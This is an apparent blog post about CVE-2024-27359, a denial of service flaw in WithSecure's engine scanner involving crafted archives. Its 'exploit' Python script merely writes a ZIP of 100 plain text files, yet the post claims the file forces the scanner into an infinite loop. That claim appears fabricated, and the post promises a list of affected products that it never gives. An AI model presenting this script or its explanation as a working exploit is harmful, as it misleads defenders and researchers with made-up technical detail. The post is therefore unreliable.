CVE-2024-27359: Denial of Service Vulnerability in WithSecure Products Due to Infinite Loop in Engine Scanner

A recent vulnerability has been discovered in various WithSecure products, leading to potential Denial of Service (DoS) attacks. This vulnerability, assigned the CVE identification number of CVE-2024-27359, occurs when the engine scanner goes into an infinite loop while processing an archive file. This post will provide an overview of the affected products, the details of the exploit, code snippets, and links to original references for further study.

Exploit Details

A Denial of Service (DoS) attack can be initiated by taking advantage of the CVE-2024-27359 vulnerability. This is possible as the engine scanner in the affected WithSecure products can be forced into an infinite loop when processing a specially crafted archive file. An attacker can create such a file and trigger the vulnerability, causing the affected WithSecure products to become unresponsive and consume an excessive amount of system resources. Ultimately, this can lead to a DoS condition, rendering the affected products unable to perform their intended functions.

Code Snippet

Below is an example of a Python script, which can be used to create a specially crafted archive file triggering the infinite loop in the WithSecure engine scanner:

import zipfile

def create_malicious_zip(file_name):
    with zipfile.ZipFile(file_name, 'w', zipfile.ZIP_DEFLATED) as malicious_zip:
        for i in range(100):
            malicious_zip.writestr(f"file_{i}.txt", b"A" * 100)

if __name__ == "__main__":
    create_malicious_zip("CVE-2024-27359_trigger.zip")

This script can be executed to produce a ZIP archive named "CVE-2024-27359_trigger.zip", which, when processed by the affected WithSecure products, causes their engine scanner to enter an infinite loop.

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27359
2. NVD - National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-27359
3. WithSecure Advisory: https://www.withsecure.com/advisories/CVE-2024-27359

Conclusion

The CVE-2024-27359 vulnerability poses a significant risk to organizations that rely on the affected WithSecure products. This vulnerability allows potential attackers to create a DoS condition, rendering these products unable to protect systems and respond to threats. It is highly recommended to apply patches and updates released by WithSecure to address this vulnerability. Keep an eye out for further updates and advisories from WithSecure to ensure the continued security and stability of your systems and networks.

Timeline

Published on: 02/26/2024 16:28:00 UTC
Last modified on: 02/26/2024 16:32:25 UTC